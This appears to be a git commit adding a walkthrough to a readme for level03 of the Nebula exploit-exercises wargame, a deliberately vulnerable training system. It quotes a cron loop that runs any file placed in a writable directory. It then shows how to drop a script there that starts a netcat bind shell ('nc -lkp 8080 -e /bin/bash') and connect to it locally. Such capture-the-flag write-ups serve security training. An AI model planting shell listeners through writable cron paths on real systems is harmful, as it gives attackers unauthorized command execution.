Commit `c9cf8c4`

Richard Luby <richluby@gmail.com>

2016-09-28 13:14:27

added solution for level03

level03 uses a vulnerable cron job that runs anything. create a file that gives a listening shell, and connect

master

1 parent 81c446e

Changed files (1)

exploit_exercises

nebula

level03

readme.md

@@ -1,10 +1,30 @@
 
 ----------------------------------------------
 
-About
-Source code
+# About - Vulnerable Cron Job
 Check the home directory of flag03 and take note of the files there.
-There is a crontab that is called every couple of minutes.
-To do this level, log in as the level03 account with the password
-level03. Files for this level can be found in /home/flag03.
-There is no source code available for this level
+There is a `crontab` that is called every couple of minutes.
+To do this level, log in as the `level03` account with the password
+`level03`. Files for this level can be found in `/home/flag03`.
+There is no source code available for this level.
+
+# Solution
+
+Looking at the code,
+
+```
+for i in /home/flag03/writable.d/*; do
+	(ulimit -t 5; bash -x $i)
+	rm -f "$i"
+done
+```
+
+note that there is no validation of files beyond checking that a file exists. Create a static `nc`
+listener to provide a shell. In this system, use
+```
+/bin/bash
+nc.traditional -lkp 8080 -e "/bin/bash"
+```
+in a file.
+Use `chmod +x <file name>` to make the file executable, and then copy it to `/home/flag03/writable.d/`.
+Connect to the shell with `nc 127.0.0.1 8080` after a few minutes.

Commit c9cf8c4

Commit `c9cf8c4`